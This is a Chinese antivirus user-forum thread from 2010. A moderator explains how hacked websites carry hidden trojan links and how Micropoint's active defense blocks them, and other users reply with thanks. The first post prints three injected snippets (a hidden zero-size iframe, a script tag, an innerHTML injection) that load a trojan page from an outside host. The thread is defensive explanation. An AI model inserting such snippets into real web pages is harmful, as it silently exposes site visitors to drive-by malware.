» 游客:  注册 | 登录 | 帮助  微点交流论坛 » 微点软件使用交流 » 浅谈微点主动防御软件防网页被挂木马功能（值得一看）    22   1/3   1   2   3   >  作者: 标题: 浅谈微点主动防御软件防网页被挂木马功能（值得一看） hanker 版主 永远的偶像 积分 963 发帖 929 注册 2007-2-28 #1  浅谈微点主动防御软件防网页被挂木马功能（值得一看） 其实这篇文章我早就想写了，一直没激情写，也是有一堆乱七八糟的杂事烦心，今天就给大家浅谈下微点主动防御防网页被挂木马功能。 我感觉我说这个还是有点权威的，为啥啊，因为咱测过啊... 现在微点主动防御已经加了网页拦截木马的功能，（其实早就加了，有小半年了吧？）先说现在的，浏览网页，网页如果有恶意脚本（就是那段该死的木马网页连接）试图对浏览器进行溢出的时候微点就会报警拦截，所以有很多人测试，为啥我网页有网页木马微点为啥不报警？那是因为是有那段网马的地址，但是真正的网马所在服务器不在线了，或者重启中，这时候微点是不报警的。因为那段地址只是存在，但是没有任何意义。 说到这先给大家说下网页被挂的木马到底是啥。 网页被挂木马有两部分，一部分在我们正常浏览的网页上(比如： www.163.com)正常的网站是没有木马的，不能自己打自己嘴巴，那是被黑客入侵，插了一句恶意脚本，通常是 1）<iframe src=”http://111.tmkkk.com/muma.htm” width=0 height=0></iframe> 2）<script src=http://111.tmkkk.com/muma.js language=javascript></script> 3）top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://111.tmkkk.com/muma.htm "></iframe>' 以上是常见的，可能有的朋友看不明白，我简单说下，比如说163.com网站被挂马，用的是<iframe src=”http://111.tmkkk.com/muma.htm” width=0 height=0></iframe>  ，真正的网马所在地址是http://111.tmkkk.com/muma.htm，不在163的服务器上，因为163的服务器有杀毒软件，检测到就自动删除了，所以黑客一般都自己有空间，放在自己的空间。如果赶上黑客所租服务器重启，或者宕机，这个时候浏览163的网站是安全的，只是有个恶意链接，但对系统没有任何作用，所以微点可能是不报警的。很多人大喧说微点拦截网马没用，不是没用，是他不懂。 <iframe src=”http://111.tmkkk.com/muma.htm” width=0 height=0></iframe>是个0窗口，你看不到，一闪而过，那个所存在网页还有个exe文件，是个木马，muma.htm 的脚本大意是自动下载并自动执行木马。 再说微点主动防御之前是如何拦截网页木马的，通过上面已经找到木马是能够自动下载自动执行木马了，微点是靠行为来判断病毒的，所以自动下载木马，微点主动防御不报警，自动执行微点就报警了，有的网马做的比较失败，下载下来了，但是没有被执行，这微点也不会报警。 简单说下啥是网页被挂木马，网上有很多说的都是错的，什么是网页木马，网页木马是webshell，我们常见的网页被挂了木马，到现在还没个通俗的叫法，呵呵。 通过上面我想大家基本对网页被挂木马和微点主动防御软件如何做都的，应该有了解了，希望大家能挑刺拍砖。 可能有错别字，因为拼音打的，有不明白的，请大家后面跟帖说下，偶慢慢解释。 一定要挑刺拍砖啊！！！ ※ ※ ※ 本文纯属【hanker】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ http://hi.baidu.com/hanker315 2010-1-18 10:01 hanker 版主 永远的偶像 积分 963 发帖 929 注册 2007-2-28 #2   我看了 http://bbs.micropoint.com.cn/showthread.asp?tid=64622 这个贴之后再也忍不住了，发了此贴 ※ ※ ※ 本文纯属【hanker】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ http://hi.baidu.com/hanker315 2010-1-18 10:02 jackybaby 中级用户 积分 330 发帖 321 注册 2006-12-31 来自 sz #3   嗯，这下明白透彻了。 其实换个浏览器省很多事，或者加条IE为基本用户的组策略也很省事。 ※ ※ ※ 本文纯属【jackybaby】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 微点+组策略，不知毒滋味。 2010-1-18 11:00 lsj301 银牌会员 积分 1388 发帖 1382 注册 2009-3-16 来自 甘肃兰州 #4   学习了。 ※ ※ ※ 本文纯属【lsj301】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 我们一直在默默支持微点! 2010-1-18 11:06 tustin 版主 积分 5092 发帖 5067 注册 2007-3-10 来自 重庆 #5   来接受h版的教导 ※ ※ ※ 本文纯属【tustin】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ Micropoint微點——克服滯后殺毒缺陷 開創主動防御時代 2010-1-18 12:10 jaber 版主 使用与技巧区版主 积分 2861 发帖 2835 注册 2006-6-6 #6     H版好同志啊  偶给你加亮咯！ 学习的好文章啊！ ※ ※ ※ 本文纯属【jaber】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ XP2（原版未打补丁） 单独微点预升级 2010-1-18 12:42 hanker 版主 永远的偶像 积分 963 发帖 929 注册 2007-2-28 #7   呵呵，谢谢啦。 今天比较冷，烧锅炉用煤量大，上面领导喊着不是太热，我擦，逼急了我热的他们不敢出门.... 累死我了 ※ ※ ※ 本文纯属【hanker】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ http://hi.baidu.com/hanker315 2010-1-18 15:32 hds_ss 银牌会员 积分 1105 发帖 1101 注册 2007-2-26 #8   明白了，谢谢！ ※ ※ ※ 本文纯属【hds_ss】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 系统为：XP Professional 版本为 2002 Sercice Pack 2 Intel946GZ+1G+PD820 预升级用户 2010-1-18 16:06 微点专家 版主 Weizi 积分 11554 发帖 11458 注册 2006-8-27 来自 贵阳 #9   5、6楼马屁精 ※ ※ ※ 本文纯属【微点专家】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 做个性的自己 2010-1-18 18:12 微点专家 版主 Weizi 积分 11554 发帖 11458 注册 2006-8-27 来自 贵阳 #10   对楼主的敬仰有如滔滔江水连绵不绝，实在是我等学习的榜样 ※ ※ ※ 本文纯属【微点专家】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 做个性的自己 2010-1-18 18:13  22   1/3   1   2   3   >  论坛跳转: 微点软件公测区 安全快报  > 病毒快报  > 漏洞快报 微点产品在线技术支持  > 微点主动防御软件  > 预升级反馈专区  > 微点杀毒软件 微点用户交流区  > 微点新闻  > 微点软件使用交流  > 微点茶室 安全技术交流区  > 主动防御  > 反病毒  > 防火墙 综合区  > 电脑&数码  > 体育&娱乐&休闲  > 灌水区 版务管理 内部使用专区  可打印版本 | 推荐 | 订阅 | 收藏 [ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司 闽ICP备05030815号